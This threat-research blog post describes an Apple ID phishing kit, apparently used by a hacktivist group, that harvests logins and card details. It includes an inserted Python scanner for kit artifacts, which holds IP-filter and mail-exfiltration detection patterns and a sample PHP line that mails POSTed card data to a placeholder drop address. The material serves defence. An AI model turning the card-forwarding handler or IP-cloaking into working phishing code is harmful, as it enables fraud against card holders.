Hacktivists Turn to Phishing to Fund Their Causes


At McAfee we recently observed a phishing campaign targeting Apple account holders.


The link directed the user to a compromised WordPress site used to serve the fake Apple ID login page.


Users are asked to log in with their Apple IDs, and then are requested to update billing information and credit card details. In the following images we have highlighted some indicators that the site is not legitimate.


Users are then redirected to the official Apple page.


The phishers typically bundle all the scripts that make up the phishing page into a local .zip file, upload it to a compromised server, extract it, and then delete the archive. On this occasion, the phisher appears to have forgotten that last step.


This oversight enabled us to see how the website code worked; we found some interesting comments.

The .zip file contained a readme that states the results would be stored locally, although this was not the case.


We also found some .htaccess files. These block access to the site based on the originating IP address of the connection, to keep the site from being fetched and analyzed by automated scrapers.


Depending on the page a user lands on—credit card, Apple login, or address change—a .php script generates an email and sends it to bayremking0@gmail.com.
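A defender-side check for the three artifacts described above (a leftover kit archive, an .htaccess that filters visitors by source IP, and a PHP form handler that mails its input to a hard-coded mailbox). This is an added example, not code from the kit or from McAfee; the web root it scans is constructed in a temporary directory, and the recipient address in it is a placeholder.

```python
import os
import re
import tempfile
import zipfile

# Indicators from the post: kit archive left on the server, .htaccess that
# denies by source IP, and a PHP mail() call with a hard-coded recipient.
ARCHIVE_EXTS = {".zip", ".rar", ".tar", ".gz", ".7z"}
HTACCESS_IP_FILTER = re.compile(
    r"^\s*(deny\s+from\s+\d|RewriteCond\s+%\{REMOTE_ADDR\})", re.I | re.M)
PHP_MAIL_TO_LITERAL = re.compile(
    r"\bmail\s*\(\s*['\"]([^'\"@]+@[^'\"]+)['\"]", re.I)


def read_text(path):
    with open(path, encoding="utf-8", errors="replace") as fh:
        return fh.read()


def scan_webroot(root):
    # Walk the web root and return sorted (indicator, relative path) pairs.
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            ext = os.path.splitext(name)[1].lower()
            if ext in ARCHIVE_EXTS:
                findings.append(("leftover-archive", rel))
            elif name == ".htaccess":
                if HTACCESS_IP_FILTER.search(read_text(path)):
                    findings.append(("htaccess-ip-filter", rel))
            elif ext == ".php":
                m = PHP_MAIL_TO_LITERAL.search(read_text(path))
                if m:
                    findings.append(("php-mail-to:" + m.group(1), rel))
    return sorted(findings)


def build_sample_site(root):
    """Constructed sample mimicking the kit layout; not real kit code."""
    with zipfile.ZipFile(os.path.join(root, "apple.zip"), "w") as zf:
        zf.writestr("readme.txt", "results are stored locally")
    with open(os.path.join(root, ".htaccess"), "w") as fh:
        fh.write("order allow,deny\ndeny from 66.249.0.0/16\nallow from all\n")
    with open(os.path.join(root, "card.php"), "w") as fh:  # placeholder recipient
        fh.write('<?php mail("drop@example.invalid", "CC", $_POST["cc"]); ?>')


def demo():
    root = tempfile.mkdtemp()
    build_sample_site(root)
    return scan_webroot(root)
```

Run `demo()` to build the sample site and scan it; on a real host, point `scan_webroot` at the document root and treat each hit as a lead to inspect, not as proof on its own.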


In one of the .php files we found a reference to a hacktivist group. We did some investigating and found this name had been associated with several website defacements. The group’s activities promote a set of political views, so we suspect that the group was funding its operations through this new phishing scam.

We received another phishing email that was identical to the original one apart from the URL it linked to. It served the same fake Apple page but this time it did not contain the .zip file. We went to the homepage of the compromised site and found it had also been defaced.

This confirmed our view that the original phishing site was hacked by the hacktivist group. It seems that political hackers are now using their skills to generate income to aid their causes.

McAfee customers are protected from this campaign through heuristic definitions and McAfee Global Threat Intelligence reputation.
